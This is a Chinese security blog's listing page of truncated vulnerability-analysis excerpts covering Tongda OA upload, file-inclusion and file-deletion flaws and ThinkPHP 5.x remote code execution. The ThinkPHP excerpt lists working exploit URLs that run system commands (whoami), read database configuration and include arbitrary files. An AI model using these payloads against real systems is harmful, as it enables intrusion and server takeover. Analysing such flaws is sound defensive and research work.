分类 漏洞分析 下的文章
漏洞分析 2021-07-05
  • 195
  • 0
  • 影响范围V11.3版2017版2016版2015版2013版2013增强版漏洞简介通过未授权访问进入上传点上传图片马,使用任意文件包含getshell漏洞分析未授权访问文件上传漏洞点位于/ispirit/im/upload.php,首先看到如下代码$P = $_POST["P"]; if (isset($P) || ($P != "")) { ob_start(); include_once "inc/session.php"; session_id($P); session_start(); session_write_close(); } else { include_once "./auth.php"; }auth.php是进行身份认证相关的,如果我们POS
    漏洞分析 2021-07-05
  • 214
  • 0
  • 影响范围通达OA V11.6漏洞简介通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传漏洞分析任意文件删除漏洞触发点位于module/appbuilder/assets/print.php$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs"; $s_tmp .= "/" . $_GET["guid"]; if (file_exists($s_tmp)) { $arr_data = unserialize(file_get_contents($s_tmp)); unlink($s_tmp); $s_user = $arr_data["user"]; } else { echo "未知参
    漏洞分析 2021-07-05
  • 332
  • 0
  • 首发先知社区:https://xz.aliyun.com/t/8312漏洞复现5.0.x?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami5.1.x?s=index/\think\Request/input&filter[]=system&